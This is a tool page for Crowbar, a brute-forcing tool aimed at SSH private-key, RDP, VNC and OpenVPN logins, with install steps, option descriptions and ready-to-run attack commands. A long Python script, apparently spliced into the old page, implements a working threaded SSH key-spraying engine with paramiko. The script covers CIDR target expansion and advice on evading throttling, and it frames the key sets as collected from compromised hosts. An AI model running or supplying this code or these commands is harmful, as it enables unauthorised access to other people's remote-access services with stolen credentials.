Web Application Brute Force Attack: Crowbar

2014-12-26T20:58:02
ID N0WHERE:25511
Type n0where
Reporter N0where
Modified 2014-12-26T20:58:02

Description

Crowbar was developed to brute force some protocols in a manner different from other 'popular' brute forcing tools. For example, while most brute forcing tools use a username and password for SSH brute forcing, Crowbar uses SSH private keys: given a set of keys (for instance ones collected from an already compromised host), it tries each one against each target and user to find where the key is accepted. Despite the page title, the services it targets (OpenVPN, SSH, VNC, RDP) are remote-access services, not web applications.

Currently Crowbar supports

  • OpenVPN
  • SSH private key authentication
  • VNC key authentication
  • Remote Desktop Protocol (RDP) with NLA support

Installation

First install the dependencies (the client binaries Crowbar drives for OpenVPN, RDP and VNC):

 # apt-get install openvpn freerdp-x11 vncviewer

Crowbar is a Python script; its SSH key module uses the paramiko library, so install that as well (for example with pip).

Then get the latest version from GitHub:

 # git clone https://github.com/galkan/crowbar

Usage

  • -h : Shows the help menu.
  • -b : Target service. Crowbar currently supports vnckey, openvpn, sshkey and rdp.
  • -s : Target IP address or network in CIDR notation (e.g. 192.168.2.182/32).
  • -S : File containing the target IP addresses, one per line.
  • -u : Username.
  • -U : File containing a list of usernames.
  • -n : Thread count.
  • -l : Log file name. The default is crowbar.log in the current directory.
  • -o : Output file that stores the successful attempts.
  • -c : Password.
  • -C : File containing a list of passwords.
  • -t : Timeout value.
  • -p : Port number.
  • -k : Full path of the key file (SSH private key, VNC passwd file or OpenVPN CA certificate, depending on the service).
  • -m : OpenVPN configuration file path.
  • -d : Run nmap first to discover whether the target port is open, so that closed hosts are skipped and only live services are brute forced.
  • -v : Verbose mode, which shows all attempts including failures.


Examples:

Brute forcing RDP

RDP brute force attempt to a single IP address using a single username and a single password:

crowbar.py -b rdp -s 192.168.2.182/32 -u admin -c Aa123456

Brute forcing SSH

SSH key brute force attempt against a single IP address using a single username and an SSH private key:

crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa

Brute forcing VNC server

VNC brute force attempt against a single IP address using a VNC passwd file (as written by vncpasswd) and a specified port number:

crowbar.py -b vnckey -s 192.168.2.105/32 -p 5902 -k /root/.vnc/passwd

Brute forcing OpenVPN

OpenVPN brute force attempt against a single IP address using a configuration file, a CA certificate file, a single username and a single password with a specified port number:

crowbar.py -b openvpn -s 198.7.62.204/32 -p 443 -m /root/Desktop/vpnbook.ovpn -k /root/Desktop/vpnbook_ca.crt -u vpnbook -c cr2hudaF
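The options above and the sshkey example describe what Crowbar does for -b sshkey: expand the -s/-S targets, walk every (host, user, key) combination with -n threads, and log each attempt. The following is an added example, not Crowbar's own code, that implements that engine in Python. It uses the standard library for the target expansion and threading and paramiko for the actual public-key authentication; the network step is passed in as a function (the `connector` parameter, an assumption of this example) so the planning and logging logic can be exercised offline. The log line format is modelled on, not copied from, Crowbar's.

```python
"""SSH private-key spraying engine in the style of Crowbar's sshkey mode.

Added example, not Crowbar's code. Expands CIDR targets, fans one attempt per
(host, user, key) triple out over a thread pool and records crowbar-like log
lines. The connector is injectable; the default one uses paramiko.
"""
import ipaddress
import itertools
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable, List, Tuple

try:
    import paramiko  # only needed by the live connector
except ImportError:  # planner and logger still work without it
    paramiko = None

Attempt = Tuple[str, int, str, str]  # host, port, user, key path
Connector = Callable[[str, int, str, str, float], bool]


def expand_targets(specs: Iterable[str]) -> List[str]:
    """Turn '192.168.2.105/32' or '10.0.0.0/30' into host addresses (like -s/-S)."""
    hosts: List[str] = []
    for spec in specs:
        spec = spec.strip()
        if not spec or spec.startswith("#"):
            continue  # skip blank lines and comments in a target file
        net = ipaddress.ip_network(spec, strict=False)
        if net.num_addresses <= 2:
            # /31 and /32: no network/broadcast to drop, use every address
            hosts.extend(str(a) for a in net)
        else:
            hosts.extend(str(a) for a in net.hosts())
    return hosts


def build_attempts(specs: Iterable[str], users: Iterable[str],
                   keys: Iterable[str], port: int = 22) -> List[Attempt]:
    """The full cross product Crowbar-style tools walk for sshkey mode."""
    return [(h, port, u, k)
            for h, u, k in itertools.product(expand_targets(specs), list(users), list(keys))]


def paramiko_connector(host: str, port: int, user: str, key_path: str,
                       timeout: float) -> bool:
    """Live network step: exactly one publickey authentication attempt."""
    if paramiko is None:
        raise RuntimeError("paramiko is required for live attempts")
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, key_filename=key_path,
                       timeout=timeout, look_for_keys=False, allow_agent=False)
        return True
    except paramiko.AuthenticationException:
        return False
    except (paramiko.SSHException, OSError):
        return False  # unreachable host or timeout counts as a failed attempt
    finally:
        client.close()


def spray(attempts: List[Attempt], connector: Connector = paramiko_connector,
          threads: int = 5, timeout: float = 5.0):
    """Run the attempts concurrently; return (successes, log lines)."""
    log: List[str] = []

    def one(a: Attempt):
        host, port, user, key = a
        ok = connector(host, port, user, key, timeout)
        log.append(f"{'SSH-SUCCESS' if ok else 'SSH-FAIL'}: {host}:{port} - {user}:{key}")
        return a, ok

    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = list(pool.map(one, attempts))
    return [a for a, ok in results if ok], log


if __name__ == "__main__":
    # Equivalent of: crowbar.py -b sshkey -s 192.168.2.105/32 -u root -k /root/.ssh/id_rsa
    plan = build_attempts(["192.168.2.105/32"], ["root"], ["/root/.ssh/id_rsa"])
    hits, lines = spray(plan, threads=1)
    print("\n".join(lines))
    print("valid:", hits)
```

`look_for_keys=False` and `allow_agent=False` matter: without them paramiko silently adds the operator's own keys and agent to every attempt, which both pollutes the results and leaks those keys to every target. Keep the thread count modest; sshd's MaxStartups throttling will otherwise drop connections, and those show up as failures rather than as rejected keys.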

Source && Download

https://github.com/galkan/crowbar